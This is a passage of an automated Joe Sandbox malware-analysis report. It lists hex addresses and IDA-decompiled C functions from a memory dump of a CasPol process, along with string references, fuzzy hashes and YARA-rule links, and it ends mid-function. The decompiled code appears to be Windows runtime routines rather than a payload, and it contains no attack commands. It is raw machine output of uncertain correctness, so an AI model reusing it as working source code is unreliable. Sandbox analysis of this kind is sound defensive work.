0x015d2dd5
0x015d2dde
0x015d2de1
0x015d2e70
0x015d2e72
0x015d2e72
0x015d2de7
0x015d2deb
0x015d2e7c
0x015d2e83
0x015d2e85
0x015d2e8b
0x015d2e8d
0x015d2e92
0x015d2e92
0x015d2e85
0x015d2df1
0x015d2df7
0x015d2df9
0x015d2df9
0x015d2dfc
0x015d2dff
0x015d2e02
0x00000000
0x015d2e05
0x015d2e0c
0x0162f9d9
0x015d2e12
0x015d2e12
0x015d2e12
0x015d2e1a
0x0162f9e3
0x0162f9e9
0x0162f9f0
0x0162f9f6
0x0162f9f8
0x0162f9f8
0x0162f9f0
0x015d2e23
0x0162fa02
0x0162fa03
0x0162fa05
0x0162fa06
0x00000000
0x015d2e29
0x015d2e29
0x015d2e2e
0x015d2e34
0x015d2e3e
0x00000000
0x00000000
0x015d2e44
0x015d2e47
0x015d2e4d
0x00000000
0x00000000
0x015d2e4f
0x015d2e54
0x00000000
0x00000000
0x015d2e5a
0x015d2e5f
0x015d2e9a
0x015d2ea4
0x015d2ea5
0x015d2ea8
0x015d2eaf
0x015d2eb2
0x015d2eb5
0x0162fae9
0x0162faeb
0x0162faed
0x0162faef
0x0162faf7
0x0162faf8
0x0162fafd
0x0162faff
0x0162fb04
0x0162fb04
0x0162faff
0x015d2ec0
0x015d2ec4
0x015d2ec6
0x015d2ec8
0x0162fb14
0x0162fb18
0x0162fb1e
0x0162fb21
0x0162fb21
0x015d2ece
0x015d2ece
0x015d2ece
0x015d2ed7
0x015d2e61
0x015d2e63
0x0162fa6b
0x0162fa71
0x0162fa76
0x0162fa78
0x0162fa8a
0x0162fa7a
0x0162fa83
0x0162fa83
0x0162fa8f
0x0162fa91
0x0162fa97
0x0162fa9d
0x0162faa4
0x0162faaa
0x0162faaf
0x0162fab1
0x0162fac3
0x0162fab3
0x0162fabc
0x0162fabc
0x0162fac8
0x0162facb
0x0162fadf
0x0162fadf
0x0162facb
0x0162faa4
0x0162fa91
0x015d2e6f
0x015d2e6f
0x015d2e5f
0x0162fa13
0x0162fa15
0x0162fa17
0x0162fa1f
0x0162fa21
0x0162fa22
0x0162fa25
0x0162fa28
0x0162fa2f
0x0162fa2f
0x0162fa2a
0x0162fa2a
0x0162fa2a
0x0162fa31
0x0162fa34
0x0162fa36
0x0162fa3c
0x0162fa3e
0x0162fa41
0x0162fa43
0x0162fa45
0x0162fa45
0x0162fa41
0x0162fa3c
0x0162fa4a
0x0162fa4f
0x0162fa51
0x0162fa53
0x0162fa56
0x0162fa5b
0x0162fa5e
0x00000000
0x0162fa5e
0x015d2e23

Strings

RTL: Re-Waiting, xrefs: 0162FA4A

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: f9c3b72477a09d49daa0dec30b9399a3ec9280defec0e8a4d0111009e2ca1e5a
Instruction ID: 2741c8f75cacb5ca830c1155255bf3a04c3268e3e189e91d7db9e346812d596d
Opcode Fuzzy Hash: f9c3b72477a09d49daa0dec30b9399a3ec9280defec0e8a4d0111009e2ca1e5a
Instruction Fuzzy Hash: 1C61DE31A00A55EFEB32DB6CCC80B7EBBB5FB44714F140AA9E9119B2C1CB7499018B91

Uniqueness

Uniqueness Score: -1.00%

Function 016A0EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E016A0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0169FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E016A1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01619730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0169A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0169A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x16c8b04 >> 0x14) + (_v44 -  *0x16c8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E015F7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0169138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E015F7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0168FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x16c8724 & 0x00000008) != 0) {
						E016952F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E016A15B5(0x16c8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x016a0eb7
0x016a0eb9
0x016a0ec0
0x016a0ec2
0x016a0ecd
0x016a105b
0x016a105b
0x016a1061
0x016a1066
0x016a1066
0x016a106b
0x016a1073
0x016a1073
0x016a0ed3
0x016a0ed6
0x016a0edc
0x016a0ee0
0x016a0ee7
0x016a0ef0
0x016a0ef5
0x016a0efa
0x016a0efc
0x016a0efd
0x016a0f03
0x016a0f04
0x016a0f06
0x016a0f07
0x016a0f09
0x016a0f0e
0x016a0f14
0x016a0f23
0x016a0f2d
0x016a0f34
0x016a0f34
0x016a0f14
0x016a0f52
0x00000000
0x00000000
0x016a0f58
0x016a0f73
0x016a0f74
0x016a0f79
0x016a0f7d
0x016a0f80
0x016a0f86
0x016a0fab
0x016a0fb5
0x016a0fc6
0x016a0fd1
0x016a0fe3
0x016a0fd3
0x016a0fdc
0x016a0fdc
0x016a0feb
0x016a1009
0x016a1009
0x016a1015
0x016a1027
0x016a1017
0x016a1020
0x016a1020
0x016a102f
0x016a103c
0x016a103c
0x016a1048
0x016a1050
0x016a1050
0x016a1055
0x00000000
0x016a1055
0x016a0f88
0x016a0f9e
0x016a0fa2
0x016a0fa9
0x00000000
0x00000000
0x00000000
0x016a0fa9
0x00000000

Strings

`, xrefs: 016A0F16

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: ad1bc63d23ee8a4ecfd01d27ec7bec2f223e9d41d52b5ce1436cd7aaafcf8e25
Instruction ID: dc385105b73d83469d571dbe4476f6bf66d2f0db42f3f898b79537b6f2062253
Opcode Fuzzy Hash: ad1bc63d23ee8a4ecfd01d27ec7bec2f223e9d41d52b5ce1436cd7aaafcf8e25
Instruction Fuzzy Hash: E4519D712043429FD725DF28DD84B2BBBE9EBC5614F44096CFA9697290DB70EC05CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0160F0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0160F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E015F4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01619830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01619990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E016195D0();
							goto L11;
						} else {
							_t109 = L015F4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0161F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E016195D0();
										L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0160f0d3
0x0160f0d9
0x0160f0e0
0x0160f0e7
0x0160f0f2
0x0160f0f4
0x0160f0f8
0x0160f100
0x0160f108
0x0160f10d
0x0160f115
0x0160f116
0x0160f11f
0x0160f123
0x0160f124
0x0160f12c
0x0160f130
0x0160f134
0x0160f13d
0x0160f144
0x0160f14b
0x0160f152
0x0164bab0
0x0164bab0
0x0160f158
0x0160f158
0x0160f15a
0x0160f160
0x0160f165
0x0160f166
0x0160f16f
0x0160f173
0x0164baa7
0x0164baa7
0x0164baab
0x00000000
0x0160f179
0x0160f18d
0x0160f191
0x0164baa2
0x00000000
0x0160f197
0x0160f19b
0x0160f1a2
0x0160f1a9
0x0160f1af
0x0160f1b2
0x0160f1b6
0x0160f1b9
0x0160f1c4
0x0160f1d8
0x0160f1df
0x0160f1e3
0x0160f1eb
0x0160f1ee
0x0160f1f4
0x0160f20f
0x0164bab7
0x0164babb
0x0164bacc
0x0164bad1
0x0160f215
0x0160f218
0x0160f226
0x0160f22b
0x00000000
0x0160f22b
0x0160f1f6
0x0160f1f6
0x0160f1f9
0x0160f1fb
0x0160f1fb
0x0160f1f4
0x0160f191
0x0160f173
0x0160f152
0x0160f203

Strings

@, xrefs: 0160F124

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 63267a839dc6a24441f050a36eabe93afc8f27478d34af8a83f89c6eb830fba9
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 4C51BC71204711AFC321DF29C840A6BBBF9FF88710F00892EFA9597690E7B4E944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01653540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01653540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x16cd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01610BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01653706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0161FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01653540;
						E0161FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0162DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01660C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E016197C0();
					}
					return E0161B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01653971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01653884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0161FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01619650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01653787(_a4,  &_v352, _t80);
						}
					}
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E016195D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01653552
0x0165355a
0x0165355d
0x01653566
0x01653567
0x0165357e
0x0165358f
0x016535a1
0x016535a5
0x0165366b
0x0165366b
0x0165366d
0x01653672
0x01653679
0x01653685
0x0165368d
0x0165369d
0x016536a7
0x016536b8
0x016536c6
0x016536c7
0x016536dc
0x016536e1
0x016536e7
0x016536e9
0x016536e9
0x01653703
0x01653703
0x016535b5
0x016535c0
0x016535c4
0x00000000
0x00000000
0x016535ca
0x016535d7
0x016535e2
0x016535e6
0x016535e8
0x016535f5
0x016535fa
0x01653603
0x01653604
0x01653609
0x0165360a
0x01653612
0x01653613
0x0165361e
0x01653622
0x01653628
0x0165362f
0x0165362f
0x01653636
0x01653638
0x0165363b
0x01653642
0x01653642
0x01653636
0x01653657
0x01653657
0x0165365c
0x01653662
0x01653669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0165358F

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 2b82530bda65bca6071d7b1fdf16eeb327e1a7c8daf187f3e3ede71f4475498b
Instruction ID: 2ae42ba9f1a686201d711a3010dbd9df141704d9be70b1878369a1fe07f2bead
Opcode Fuzzy Hash: 2b82530bda65bca6071d7b1fdf16eeb327e1a7c8daf187f3e3ede71f4475498b
Instruction Fuzzy Hash: 7D4137B2D0152D9BDB61DA54CC80FEEB77DAB54754F0045E9EA09A7240DB309E88CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 016A05AC Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E016A05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E016A07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01619730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0169A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0169A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E016A1293(_t79, _v40, E016A07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E015F7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0169138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x016a05c5
0x016a05ca
0x016a05d3
0x016a06db
0x016a06db
0x016a06dd
0x016a06e3
0x016a06e3
0x016a05dd
0x016a05e7
0x016a05f6
0x016a0600
0x016a0607
0x016a0610
0x016a0615
0x016a061a
0x016a061c
0x016a061e
0x016a0624
0x016a0625
0x016a0627
0x016a0628
0x016a0631
0x016a0640
0x016a064d
0x016a0654
0x016a0654
0x016a0631
0x016a066d
0x016a0674
0x00000000
0x00000000
0x016a0692
0x016a069e
0x016a06b0
0x016a06a0
0x016a06a9
0x016a06a9
0x016a06b8
0x016a06d6
0x016a06d6
0x00000000

Strings

`, xrefs: 016A0633

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: cebf9c38ecf748a87d8b9c4006e038938294f268d7d072f870704ecfab88657d
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 2B3102326043166BE720DE28CD84F9B7BD9EBC4758F144229FA58DB280D770ED04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01653884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01653884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01619650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L015F4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01619650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01653893
0x01653896
0x01653899
0x0165389f
0x016538a0
0x016538a4
0x016538a9
0x016538ac
0x016538ad
0x016538ae
0x016538af
0x016538b1
0x016538b4
0x016538bb
0x016538bc
0x016538bd
0x016538c4
0x016538c8
0x016538ca
0x016538ca
0x016538d5
0x0165393e
0x01653940
0x01653942
0x01653952
0x01653954
0x01653961
0x01653961
0x01653967
0x0165396e
0x0165396e
0x01653947
0x0165394c
0x00000000
0x0165394c
0x016538ea
0x016538ee
0x016538f8
0x016538f9
0x016538ff
0x01653900
0x01653902
0x01653903
0x0165390b
0x0165390f
0x01653950
0x00000000
0x01653950
0x01653915
0x0165391d
0x0165391d
0x01653922
0x01653926
0x00000000
0x01653928
0x0165392b
0x0165392b
0x01653935
0x01653937
0x01653937
0x00000000
0x01653935
0x01653926
0x016538f0
0x00000000

Strings

BinaryName, xrefs: 016538B4

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 2fd0fe22f4d5fab9180eb38e860750370805e765c356681fa83ee50ee409f8b2
Instruction ID: 56f78ef853da896cd0d5b9cbf30631dce8587e0c9d06140c3cfc009f7497ce55
Opcode Fuzzy Hash: 2fd0fe22f4d5fab9180eb38e860750370805e765c356681fa83ee50ee409f8b2
Instruction Fuzzy Hash: 1031E3B290151AAFEB15DA58CD45E6BFB74FF80BA0F014169ED54AB391E7309E00C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0160D294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0160D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x16cd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E015F4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0161B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E016198D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E016195D0();
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0160d29c
0x0160d2a6
0x0160d2b1
0x0160d2b5
0x0160d2b6
0x0160d2bc
0x0160d2bd
0x0160d2be
0x0160d2bf
0x0160d2c2
0x0160d2c4
0x0160d2cc
0x0160d384
0x0160d34b
0x0160d34f
0x0160d350
0x0160d351
0x0160d35c
0x0160d35c
0x0160d2d6
0x0160d2da
0x0160d2e1
0x0160d361
0x0160d369
0x0160d36d
0x0160d2e3
0x0160d2e3
0x0160d2e3
0x0160d2e5
0x0160d2ed
0x0160d2f5
0x0160d2fa
0x0160d302
0x0160d303
0x0160d30b
0x0160d30f
0x0160d313
0x0160d318
0x0160d31c
0x0160d320
0x0160d379
0x0160d37d
0x00000000
0x00000000
0x0164affe
0x0164b001
0x0164b011
0x00000000
0x0160d322
0x0160d322
0x0160d330
0x0160d337
0x0160d35d
0x0160d339
0x0160d33f
0x0160d38c
0x0160d38c
0x0160d33f
0x0160d349
0x00000000
0x0160d349

Strings

@, xrefs: 0160D303

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c971308a45e0ba798f98d1f8dfddc68cbefaa74ed42a6eb85991d376cd1e8f05
Instruction ID: 3346f1af7cf1302898e341fa9f541788600ef7286d5f6f02d96b2954a96b109e
Opcode Fuzzy Hash: c971308a45e0ba798f98d1f8dfddc68cbefaa74ed42a6eb85991d376cd1e8f05
Instruction Fuzzy Hash: 8B3181B15083059FC31ADFA8CD8096BBBE8FB9A654F040A2EF99593290D735DD05CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 015E1B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E015E1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
